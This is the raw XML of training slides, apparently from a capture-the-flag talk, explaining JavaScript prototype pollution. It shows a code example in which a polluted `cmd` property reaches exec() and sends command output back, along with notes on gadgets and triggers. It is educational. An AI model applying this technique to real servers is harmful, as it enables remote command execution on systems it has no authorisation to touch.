                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>code that does not touch `secret`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> but can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>touch the prototype of `secret`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> if we set the input correctly...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd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"./merger.sh"</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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (secret.cmd !=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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = secret.cmd;</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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, (err, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, stderr) =&gt; {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* sends `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` and `stderr` as the response */</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console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.log(test);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p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-311150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="●"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Gadget</a:t>
            </a:r>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 Want to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manipulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> so that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is our desired command to get the flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-311150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="●"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Not manipulatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>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No way to manipulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>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 directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-311150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="92278F"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Lato"/>
              <a:buChar char="●"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thus, time to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>pollute prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-HK" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="92278F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978FBF8F-BE6C-15F3-ED7A-51A2773D5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12" name="Picture 11" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D330648D-51ED-CEEA-2723-9E50D033E35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780165" y="4401651"/>
            <a:ext cx="741849" cy="741849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136736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p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>About the speaker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A Discord message saying &quot;u bought a new speaker?&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E5098-6111-2B1D-4C83-66962DE9188A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="687657" y="2061989"/>
            <a:ext cx="7998948" cy="1651824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E24FCD-FF5F-4C4F-C8F6-4D37812B6500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038492" y="1012829"/>
            <a:ext cx="3417851" cy="341785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7B48B-AADA-AD79-379B-815AF3DB100E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The why 4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CF1459-E977-8D32-CFF0-CB8B37AA3267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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To conclude, let’s look the opposite way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-HK" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>You should NOT pollute prototype </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are other easier methods to get the flag (duh)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The programming languages involved are not prototype-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pollution prototype is ineffective at triggering the trigger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The property of the same name is already set on the original object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You cannot manipulate any prototypes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are no triggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You are hacking unethically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92278F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-HK" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="92278F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978FBF8F-BE6C-15F3-ED7A-51A2773D53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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C03AC86-40AB-1558-CDDE-4DF70F8D0795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5494157" y="3168753"/>
            <a:ext cx="649705" cy="644409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1886363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6E54F-FF41-B009-89AD-756C28BBAB47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The how</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D529C08-AE39-6F18-9B96-09C6CC6422AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The challenge is likely a web challenge and the language is likely JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>As mentioned before, it is unlikely you can simply write to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or other prototype objects directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Cannot simply execute whatever code you want directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Likewise, triggers are unlikely to be as obvious as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>And pollution prototype usually cannot get the flag by itself alone, requiring some other triggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Pollution prototype is usually used combined with other techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We can split the common difficult things into 3 parts, which will be elaborated on separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Inputting objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Polluting prototypes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Finding gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
